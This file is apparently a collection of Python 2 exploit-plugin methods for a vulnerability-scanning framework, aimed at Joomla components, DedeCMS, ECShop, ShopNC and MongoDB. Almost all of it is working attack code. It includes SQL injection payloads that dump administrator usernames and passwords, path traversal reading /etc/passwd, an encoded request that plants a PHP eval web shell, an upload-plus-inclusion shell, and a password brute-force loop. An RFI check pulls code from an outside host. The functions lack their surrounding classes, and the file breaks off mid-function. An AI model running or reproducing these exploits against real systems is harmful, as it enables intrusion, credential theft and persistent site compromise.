def _attack(self):
result = {}
payload = ""
param = {}
resp = req.get(self.url, allow_redirects=False)
if "source.txt" in resp.content:
if self.url.endswith('/'):
vulurl = self.url + "../source.txt"
else:
vulurl = self.url + "/../source.txt"
resp = req.get(vulurl, allow_redirects=False)
result['FlagInfo'] = {}
result['FlagInfo']['SourceFile'] = "\n" + resp.content
if self.url.endswith('/'):
vulurl = self.url + "../robots.txt"
else:
vulurl = self.url + "/../robots.txt"
resp = req.get(vulurl, params=param, allow_redirects=False)
match_result = re.search(self.params['name'] + '{(.*)}', resp.content)
if match_result:
result['FlagInfo'] = {}
result['FlagInfo']['TextFlag'] = self.params[
'name'] + "{" + match_result.group(1) + "}"
if resp.status_code == 200:
result['FlagInfo'] = {}
result['FlagInfo']['FileContent'] = "\n" + resp.content
return self.parse_attack(result)
def _attack(self):
result = {}
#Write your code here
vul_url='%s/blog-by-cat' % self.url
#to gain current_db name
database_sqli='/-1 union select 1,2,3,4,concat(0x7e,database(),0x3a),6,7,8'
database_url=vul_url+database_sqli
resp=req.get(database_url)
match_result=re.search(r'~(.*):',resp.content,re.I | re.M)
#print resp.content
a=match_result.group(1)
match_result0=re.search(r'~(.*)',a,re.I | re.M)
#print match_result0.group(1)
current_db=match_result0.group(1)
#got current_db name
#to gain admin_table name
db_hex=current_db.encode('hex')
db_hex='0x'+db_hex
#print 'db_hex is %s' % db_hex
table_sqli='/-1 union select 1,2,3,4,group_concat(0x7e,table_name,0x3a),6,7,8 from information_schema.tables where table_schema=%s' % db_hex
table_url=vul_url+table_sqli
#print table_url
resp=req.get(table_url)
match_result0=re.search(r'~(.*administrators):',resp.content,re.I | re.M)
a=match_result0.group(1)
match_result1=re.search(r'>~(.*)',a,re.I | re.M)
admin_table=match_result1.group(1)
#print admin_table
#got admin_table name
#to gain key_column_value
column_sqli='/-1 union select 1,2,3,4,group_concat(0x7e,username,0x3a,0x3a,0x3a,password,0x7e),6,7,8 from %s' % admin_table
columns_url=vul_url+column_sqli
#print columns_url
response=req.get(columns_url)
#print response.content
if response.status_code==200:
match_result1=re.search(r'~(.*):::(.*)~',response.content,re.I | re.M)
a=match_result1.group(1)
match_result2=re.search(r'(.*):::(.*)~',a,re.I | re.M)
#print match_result2
if match_result2:
result['AdminInfo']={}
result['AdminInfo']['Username']=match_result2.group(1)
result['AdminInfo']['Password']=match_result1.group(2)
return self.parse_output(result)
def _attack(self):
result = {}
target = self.url + '/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=119&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=102&arrs2[]=117&arrs2[]=99&arrs2[]=107&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35'
req.get(target)
req.get(self.url + '/plus/ad_js.php?aid=1&nocache=1')
shell = req.get(self.url + '/plus/x.php')
if shell.content.find('w'):
result = {'VerifyInfo':{}}
result['VerifyInfo']['shell'] = self.url + '/plus/x.php'
result['VerifyInfo']['password'] = '******'
return self.parse_result(result)
def _verify(self):
"""verify mode"""
result = {}
payload1 = '/type.php?template=tag_(){};phpinfo();{//../rss'
resp = req.get(self.url + payload1)
resp1 = req.get(self.url + '/data/cache_template/rss.tpl.php')
if "phpinfo" in resp1.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_output(result)
def _verify(self):
#验证XSS漏洞
result = {}
#特征字符串
pars = '<0x!!qaz_*'
#验证的payload
payload = '"><img+src=x+onerror=alert(/' + pars + '/)>'
#漏洞连接
exploit = '/index.php?option=com_googlesearch_cse&n=30&Itemid=97&q='
#构造访问地址
vulurl = self.url + exploit + payload
#自定义的HTTP头
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#访问
resp = req.get(url=vulurl, headers=httphead, timeout=50)
#检查
if pars in resp.content:
#漏洞验证成功
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url + exploit
result['VerifyInfo']['Payload'] = payload
return self.parse_output(result)
def _verify(self):
result = {}
username = '******' # 登陆账号
pwdlist = getLargeWeakPassword()
for pwd in pwdlist:
htmlTXT = req.get(self.url + "/login.php")
Content = pq(htmlTXT.text)
tokenStr = Content("input")
Token = tokenStr[3].value # 获取Token
_cookies = htmlTXT.cookies.get_dict() # 获取Cookies
payload = {'username': username, 'password': pwd, 'user_token': Token, 'Login': '******'}
response = req.post(self.url + "/login.php", data=payload, cookies=_cookies)
rcontent = pq(response.text)
reqMes = rcontent('.message').text()
if reqMes == "Login failed":
continue # 失败跳出本次循环
if reqMes == "CSRF token is incorrect":
result['extra'] = {}
result['extra']['error'] = 'user_token校验失败'
return self.parse_output(result) # CSRF 失败
# 成功
result['DBInfo'] = {}
result['DBInfo']['Username'] = username
result['DBInfo']['Password'] = pwd
return self.parse_output(result)
def _attack(self):
if self.check_argv():
result = {}
self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz"
post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php var_dump(md5(123));@assert($_REQUEST['gump']);?>\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n"
# 上传shell
post_url = urlparse.urljoin(self.url,'index.php?ac=common_upfile&type=')
resp = req.post(url=post_url,data=post_data)
# 从返回的内容中提取上传图片的文件名
if resp.status_code == 200:
match_result = re.search(r'value =\'(.*?)\'',resp.content,re.I | re.M)
if match_result:
# 访问本地文件包含地址
payload = "../../uploadfiles/" + match_result.group(1) + "%00"
vul_url = urlparse.urljoin(self.url,"index.php?d=" + payload)
resp = req.get(vul_url)
if resp.status_code == 200 and '202cb962ac59075b964b07152d234b70' in resp.content:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = vul_url
result['ShellInfo']['Content'] = "<?php var_dump(md5(123));@assert($_REQUEST['gump']);?>"
return self.parse_attack(result)
return self._verify()
def _attack(self):
#利用SQL注入读取数据库信息
result = {}
#访问的地址
exploit = '/index.php?option=com_estateagent&act=cat&task=showCE&id='
#利用Union方式读取信息
payload="1 AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,"\
"user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM "\
"INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- -"
#构造漏洞利用连接
vulurl = self.url + exploit + payload
#自定义的HTTP头
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#提取信息的正则表达式
parttern = '\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
#发送请求
resp = req.get(url=vulurl, headers=httphead, timeout=80)
#检查是否含有特征字符串
if '$~~~$' in resp.content:
#提取信息
match = re.search(parttern, resp.content, re.M | re.I)
if match:
#漏洞利用成功
result['DbInfo'] = {}
#数据库用户名
result['DbInfo']['Username'] = match.group(1)
#数据库版本
result['DbInfo']['Version'] = match.group(2)
return self.parse_output(result)
def _verify(self):
result = {}
payload = "\x3F\x00\x00\x00\x7E\x00\x00\x00\x00\x00\x00\x00\xD4\x07\x00\x00\x04\x00\x00\x00\x61\x64\x6D\x69\x6E\x2E\x24\x63\x6D\x64\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x18\x00\x00\x00\x10\x6C\x69\x73\x74\x44\x61\x74\x61\x62\x61\x73\x65\x73\x00\x01\x00\x00\x00\x00"
s = socket.socket()
socket.setdefaulttimeout(10)
try:
self.url = self.url.strip("http://")
host = self.url.split(":")[0]
port = int(self.url.split(":")[1])
s.connect((host, port))
s.send(payload)
recvdata = s.recv(1024)
if recvdata and 'local' in recvdata:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Port'] = port
return self.parse_attack(result)
except:
pass
s.close()
url_p = urlparse.urlparse(self.url)
url = "%s://%s:%s" % (url_p.scheme, url_p.netloc, str(port + 1000))
resp = req.get(url)
if resp.status_code == 200 and 'db version' in resp.content and 'sys info' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
return self.parse_attack(result)
def _verify(self):
#利用注入漏洞计算md5(1)
result = {}
#利用的payload
payload = '-11/**/union/**/select/**/1,2,md5(1),4,5,6,7,8--'
#漏洞地址
exploit = '/index.php?option=com_doqment&cid='
#构造访问地址
vulurl = self.url + exploit + payload
#自定义的HTTP头
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#访问
resp = req.get(url=vulurl, headers=httphead, timeout=50)
#检查是否有特殊字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b)
if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
#漏洞验证成功
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url + exploit
result['VerifyInfo']['Payload'] = payload
return self.parse_output(result)
def _verify(self):
#通过计算md5(3.1415)的值,来验证SQL注入
result = {}
#访问的地址
exploit = '/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid='
#利用union的方式(计算md5(3.1415))
payload = "-1/**/aNd/**/1=0/**/uNioN++sElecT+1,md5(3.1415)--"
#构造漏洞利用连接
vulurl = self.url + exploit + payload
#自定义的HTTP头
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#发送请求
resp = req.get(url=vulurl, headers=httphead, timeout=50)
#检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
if '63e1f04640e83605c1d177544a5a0488' in resp.content:
#漏洞验证成功
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url + exploit
result['VerifyInfo']['Payload'] = payload
return self.parse_output(result)
def _attack(self):
try:
result = {}
#获取表前缀
table_pre = self.get_table_pre(self.url)
if table_pre is None:
return self.parse_attack(result)
#获取url
data = "respond.php?code=alipay&subject=0&out_trade_no=%00' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(CHAR(126),CHAR(126),CHAR(126),user_name,CHAR(124),CHAR(124),CHAR(124),password,CHAR(126),CHAR(126),CHAR(126)) from {table_pre}_admin_user limit 1))a from information_schema.tables group by a)b%23".format(
table_pre=table_pre)
url = self.get_standard_url(data, self.url)
pattern = re.compile(r"~~~(\w+?)\|\|\|(\w+?)~~~")
for i in range(10):
r = req.get(url)
re_result = pattern.findall(r.content.decode(r.encoding))
if re_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = re_result[0][0]
result['AdminInfo']['Password'] = re_result[0][1]
return self.parse_attack(result)
return self.parse_attack(result)
except:
import traceback
traceback.print_exc()
def _verify(self):
#利用index.php文件验证RFI漏洞
result = {}
#<?php echo md5('3.1416');?>
payload = 'http://tool.scanv.com/wsl/php_verify.txt?'
#测试用的payload
vulurl = '{url}/index.php?basePath={evil}'.format(url=self.url,
evil=payload)
#伪造的HTTP头
httphead = {
'Host': 'www.google.com',
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#发送测试请求
resp = req.get(vulurl, headers=httphead, timeout=50)
#md5('3.1416')=d4d7a6b8b3ed8ed86db2ef2cd728d8ec
match = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', resp.content)
#如果成功匹配到md5('3.1416'),证明漏洞验证成功
if match:
#返回测试信息
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_output(result)
def _attack(self):
result = {}
url = urlparse.urljoin(
self.url, '/shop/index.php?act=member_address&op=address')
vul_url = urlparse.urljoin(
self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a"
values = list()
values.append("form_submit=ok&id=&true_name[]=")
values.append(payload)
values.append(
"&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123"
)
post_data = "".join(values)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
req.post(vul_url, data=post_data, headers=headers)
res = req.get(url)
if res.status_code == 200:
match_result = re.findall(r'~\w*', res.content, re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result[0][1:]
result['AdminInfo']['Password'] = match_result[1][1:]
return self.parse_attack(result)
def _attack(self):
#利用注入漏洞读取数据库信息
result = {}
#利用的payload
payload = "-11/**/union/**/select/**/1,2,concat(0x247e7e7e24,version(),0x2a2a2a,user(),0x247e7e7e24),4,5,6,7,8--"
#漏洞地址
exploit = '/index.php?option=com_doqment&cid='
#构造访问地址
vulurl = self.url + exploit + payload
#自定义的HTTP头
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#正则表达式
par = "\$~~~\$([0-9a-zA-Z_].*)\*\*\*([0-9a-zA-Z_].*)\$~~~\$"
#访问
resp = req.get(url=vulurl, headers=httphead, timeout=50)
#检查是否有特殊字符串
if '$~~~$' in resp.content:
match = re.search(par, resp.content, re.I | re.M)
if match:
#漏洞利用成功
result['DatabaseInfo'] = {}
#数据库版本
result['DatabaseInfo']['Version'] = match.group(1)
#数据库用户
result['DatabaseInfo']['Username'] = match.group(2)
return self.parse_output(result)
def _verify(self):
#通过计算md5(1)的值,来验证SQL注入
result = {}
#访问的地址
exploit = '/index.php?option=com_mydyngallery&directory='
#利用floor错误回显的方式(计算md5(1))
payload="1' and 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT"\
"((SELECT SUBSTRING(CONCAT(md5(1),0x247e7e7e24),1,60)),"\
"FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a) and '1'='1"
#构造漏洞利用连接
vulurl = self.url + exploit + payload
#自定义的HTTP头
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#发送请求
resp = req.get(url=vulurl, headers=httphead, timeout=50)
#检查是否含有特征字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b)
if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
#漏洞验证成功
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url + exploit
result['VerifyInfo']['Payload'] = payload
return self.parse_output(result)
def _verify(self):
#尝试利用LFI来读取/etc/passwd的内容
result = {}
#读取的文件名
filename = '/etc/passwd'
#漏洞路径
exploit = '/index.php?option=com_jimtawl&Itemid=12&task='
#截断符号
dBs = '%00'
#..的个数
dots = '../../../../../../../../../../../../../../..'
#漏洞利用地址
vulurl = self.url + exploit + dots + filename + dBs
#伪造的HTTP头
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#发送请求,并返回结果
resp = req.get(vulurl, headers=httphead, timeout=50)
#根据状态码和返回文件的内容,判断是否利用成功
if resp.status_code == 200 and re.match('root:.+?:0:0:.+?:.+?:.+?',
resp.content):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
#记录文件内容
result['Fileinfo'] = {}
result['Fileinfo']['Filename'] = filename
result['Fileinfo']['Content'] = resp.content[0:32] + '...'
return self.parse_output(result)
def _verify(self):
#利用注入漏洞计算md5(1)
result = {}
#利用的payload(利用的是floor回显报错的方式)
payload="1' AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(md5(1),"\
"FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YLvB'='YLvB"
#漏洞页面
exploit = '/index.php?option=com_timereturns&view=timereturns&id='
#构造访问地址
vulurl = self.url + exploit + payload
#自定义的HTTP
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#尝试访问
resp = req.get(url=vulurl, headers=httphead, timeout=50)
#检查是否含有特征字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b)
if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
#漏洞验证成功
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url + exploit
result['VerifyInfo']['Payload'] = payload
return self.parse_output(result)
def _verify(self):
#通过计算md5(3.1415)的值,来验证SQL注入
result = {}
#访问的地址
exploit = '/index.php?option=com_ignitegallery&task=view&gallery='
#利用union的方式(计算md5(3.1415))
payload = "-1 union select 1,2,md5(3.1415),4,5,6,7,8,9,10--"
#构造漏洞利用连接
vulurl = self.url + exploit + payload
#自定义的HTTP头
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#发送请求
resp = req.get(url=vulurl, headers=httphead, timeout=50)
#检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
if '63e1f04640e83605c1d177544a5a0488' in resp.content:
#漏洞验证成功
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url + exploit
result['VerifyInfo']['Payload'] = payload
return self.parse_output(result)
def _verify(self):
#下面以读取/etc/passwd文件的内容为例子验证漏洞
result = {}
filename = '/etc/passwd'
url = '/index.php'
exploit = '?option=com_jequoteform&view='
dBs = '../' * 5 + '..'
ends = '%00'
#测试的URL地址
vulurl = self.url + url + exploit + dBs + filename + ends
#伪造的HTTP头
httphead = {
'Host': 'www.google.com',
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
resp = req.get(vulurl, headers=httphead, timeout=50)
if resp.status_code == 200 and re.match('root:.+?:0:0:.+?:.+?:.+?',
resp.content):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['Fileinfo'] = {}
result['Fileinfo']['Filename'] = filename
result['Fileinfo']['Content'] = resp.content
return self.parse_output(result)
def _attack(self):
#利用SQL注入读取joomla管理员信息
result = {}
#访问的地址
exploit = '/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='
#利用Union方式读取信息
payload="-1+union+all+select+1,concat(0x247e7e7e24,username,0x2a2a2a,password"\
",0x247e7e7e24),3,4,5,6,7,8,9+from+jos_users--"
#构造漏洞利用连接
vulurl = self.url + exploit + payload
#自定义的HTTP头
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#提取信息的正则表达式
parttern = '\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
#发送请求
resp = req.get(url=vulurl, headers=httphead, timeout=50)
#检查是否含有特征字符串
if '$~~~$' in resp.content:
#提取信息
match = re.search(parttern, resp.content, re.M | re.I)
if match:
#漏洞利用成功
result['AdminInfo'] = {}
#用户名
result['AdminInfo']['Username'] = match.group(1)
#密码
result['AdminInfo']['Password'] = match.group(2)
return self.parse_output(result)
def _attack(self):
#利用SQL注入读取数据库信息
result = {}
#访问的地址
exploit = '/index.php?option=com_jeeventcalendar&view=event&Itemid=155&event_id='
#利用Union方式读取数据库信息
payload = "-1%22+UNION+ALL+SELECT+1,concat(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24),3,4,5,6,7,8,9,10,11%23"
#构造漏洞利用连接
vulurl = self.url + exploit + payload
#自定义的HTTP头
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#提取信息的正则表达式
parttern = '\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
#发送请求
resp = req.get(url=vulurl, headers=httphead, timeout=50)
#检查返回结果
if resp.status_code == 200:
#提取信息
match = re.search(parttern, resp.content, re.M | re.I)
if match:
#漏洞利用成功
result['DatabaseInfo'] = {}
#数据库用户名
result['DatabaseInfo']['Username'] = match.group(1)
#数据库版本
result['DatabaseInfo']['Version'] = match.group(2)
return self.parse_output(result)
def _verify(self):
#通过计算md5(1)的值,来验证SQL注入
result = {}
#访问的地址
exploit = '/index.php?option=com_jeeventcalendar&view=event&Itemid=155&event_id='
#利用Union方式(计算md5(1))
payload = "-1%22+UNION+ALL+SELECT+1,md5(1),3,4,5,6,7,8,9,10,11%23"
#构造漏洞利用连接
vulurl = self.url + exploit + payload
#自定义的HTTP头
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#发送请求
resp = req.get(url=vulurl, headers=httphead, timeout=50)
#检查是否含有特征字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b)
if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
#漏洞验证成功
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url + exploit
result['VerifyInfo']['Payload'] = payload
return self.parse_output(result)
def _verify(self):
#通过floor方式计算md5(3.1415)的值,来验证SQL注入
result = {}
#访问的地址
exploit = '/index.php?option=com_idoblog&task=profile&Itemid=&userid='
#利用floor的方式(计算md5(3.1415))
payload="-1 or 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,"\
"md5(3.1415),FLOOR(RAND(0)*2))x FROM "\
"INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
#构造漏洞利用连接
vulurl = self.url + exploit + payload
#自定义的HTTP头
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#发送请求
resp = req.get(url=vulurl, headers=httphead, timeout=50)
#检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
if '63e1f04640e83605c1d177544a5a0488' in resp.content:
#漏洞验证成功
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url + exploit
result['VerifyInfo']['Payload'] = payload
return self.parse_output(result)
def _verify(self, verify=True):
result = {}
total = 0
start_page = raw_input('start page:')
stop_page = raw_input('stop page:')
pages = int(stop_page) - int(start_page) + 1
for page_range in range(pages):
response = req.get(self.url + '/market/?page=%d' % (page_range + int(start_page))).content
raw = re.findall('<tr>([\s\S]+?)</tr>', response) #正则表达式非贪婪匹配
for amount_of_raws in range(len(raw)):
if '<span class="label label-brand">提交</span>' in raw[amount_of_raws]:
author = re.search('<img [\s\S]+?>([\s\S]+?)</a>' , raw[amount_of_raws]).group(1)
time = re.search('<td class="text-center datetime">[\s\S]+?(\d[\d :-]+)[\s\S]+?</td>' , raw[amount_of_raws]).group(1)
type = re.search('<td class="text-center">(.+)</td>' , raw[amount_of_raws]).group(1)
vid = re.search('<a class="vul-title" href="/vuldb/(ssvid-\d+)">([\s\S]+?)</a>' , raw[amount_of_raws]).group(1)
title = re.search('<a class="vul-title" href="/vuldb/ssvid-\d+">([\s\S]+?)</a>' , raw[amount_of_raws]).group(1)
award = re.search('</i>[\s\S]+?([\d\.]+kB)[\s\S]+?</td>' , raw[amount_of_raws]).group(1)
total = total + 1
print '\n'
print str(total) + '.'
print author
print time
print type
print vid
print title
print award
print '\n'
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
print 'total:' , total
return self.parse_attack(result)
def _attack(self):
#利用floor回显报错的方式,读取数据库信息
result = {}
payload="1' AND (SELECT 1222 FROM(SELECT COUNT(*),"\
"CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,"\
"FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YLvB'='YLvB"
exploit = "/index.php?option=com_timereturns&view=timereturns&id="
#提取信息的正则表达式
pars = "\$~~~\$([_a-zA-Z0-9].*)\*\*\*(.*)\$~~~\$"
#构造访问地址
vulurl = self.url + exploit + payload
#自定义的HTTP
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#尝试访问
resp = req.get(url=vulurl, headers=httphead, timeout=50)
#检查
if 'Duplicate entry' in resp.content:
#尝试提取信息
match = re.search(pars, resp.content, re.I | re.M)
if match:
#记录数据库信息
result['DatabaseInfo'] = {}
#数据库用户名
result['DatabaseInfo']['Username'] = match.group(1)
#数据库版本
result['DatabaseInfo']['Version'] = match.group(2)
return self.parse_output(result)
def _verify(self):
#验证漏洞
result = {}
#特征字符串
strxss = "<0x!Q_az*^~>"
